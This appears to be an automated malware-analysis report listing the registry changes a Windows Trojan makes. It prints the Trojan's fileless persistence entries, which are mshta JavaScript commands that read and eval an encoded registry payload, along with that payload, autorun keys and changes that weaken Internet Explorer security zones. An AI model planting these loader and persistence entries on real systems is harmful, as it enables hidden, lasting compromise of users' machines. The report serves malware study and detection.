[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7" = "1D709C0DD4691288F7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD" = "8D2E520561B1C21CD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 AB 23 78 63 4B DC 99 40 F3 EE 97 07 E1 46 59"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7"
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process regsvr32.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 88 E9 A0 DA EE 28 71 CC FF 4F AD A0 A4 07 9D"
The process regsvr32.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:qqqKk5V2ak=gr;d36Y=new ActiveXObject(WScript.Shell);RDjMp8Tw=7jV6cXJTk5;o53JnY=d36Y.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);PSfU04tT=7R;eval(o53JnY);UBTG6t3ih=Xuhqxc;P"
[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"
[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "863"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Classes\.54crF]
"(Default)" = "YoQ1"
[HKCU\Software\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"
"5232108f" = "/ÒÜ|›² ‰n_j'ÃÂÂù·ÃÂÂA¹Š=Ã’@úâ€Â¦ã¤)[ï…EÂÂÂÃÂÂÂÂÂplpÂÂÂ'½xÀPÃÂÂ&9åú„r‡BÂÂÂH‘ÃÂÂøcEâ€â€Âi¬ôŽ›ÂÂÂ@ Ë(¸)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKCU\Software\e307dfcb0a]
"f4ea4294" = "863"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"0494a3ce" = "1463001449"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 76 61 AD 3F 7D 6B 47 91 BC A6 E5 0D DC 5B 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\e307dfcb0a]
"5232108f" = "/ÒÜ|›² ‰n_j'ÃÂÂù·ÃÂÂA¹Š=Ã’@úâ€Â¦ã¤)[ï…EÂÂÂÃÂÂÂÂÂplpÂÂÂ'½xÀPÃÂÂ&9åú„r‡BÂÂÂH‘ÃÂÂøcEâ€â€Âi¬ôŽ›ÂÂÂ@ Ë(¸)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"
[HKCU\Software\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKCU\Software\Classes\YoQ1\shell\open\command]
"(Default)" = "mshta javascript:UPH9r6uZF=A4DSokG;FK87=new ActiveXObject(WScript.Shell);RSmW5p7s=f2nwkSu7f;dox2H=FK87.RegRead(HKCU\\software\\e307dfcb0a\\5119f545);LEsIMPGA1=94o2U;eval(dox2H);qz23cVjgqX=4xWUYT;"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1463001449"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
The process regsvr32.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 52 80 99 FC 92 3A 9B A6 31 A1 17 42 9D 7A 79"
The process summit_sharma.exe:2672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 76 10 06 C9 D9 ED 05 17 15 37 FA 81 58 84 D5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 85 14 81 69 93 28 09 58 35 D8 1D 56 FC 30 DD"
The process XBLive.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA DA BB 10 01 15 28 47 CB 4D 8C FE 2A 37 78 E3"
[HKLM\SOFTWARE\Microsoft\DirectX]
"EID" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 3E 8B 28 0B 7E 16 88 E4 2F 0A 2B 2F 2B 39 83"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 BE 15 85 1C ED 98 47 AD 25 69 09 FE A8 0E FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 57 29 8F 58 8A 00 55 36 D7 C0 0A D4 7F 9D 9D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 80 AE 91 25 C4 94 A7 F5 AE CA DA C7 8A 50 2C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E F0 A1 9E E7 DF 95 8B 3B 15 55 3D 63 06 51 57"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 60 C3 23 39 A9 43 EB F1 2F B5 12 D9 89 82 55"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 95 32 27 9E 61 DB 73 3F 94 CB 5B 2A 01 64 B0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 DE F0 A9 00 A1 59 EF 0A AF 09 35 5B 56 5A CB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 33 0B D0 07 E7 E6 7F 40 8A C4 69 B0 3D FA 25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 2C ED FE 93 8E 5D A8 7E 36 2E 36 CB 00 1B A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 3C D8 3C 7E 39 DF C4 8E 6E 12 23 D2 2F 5C A1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
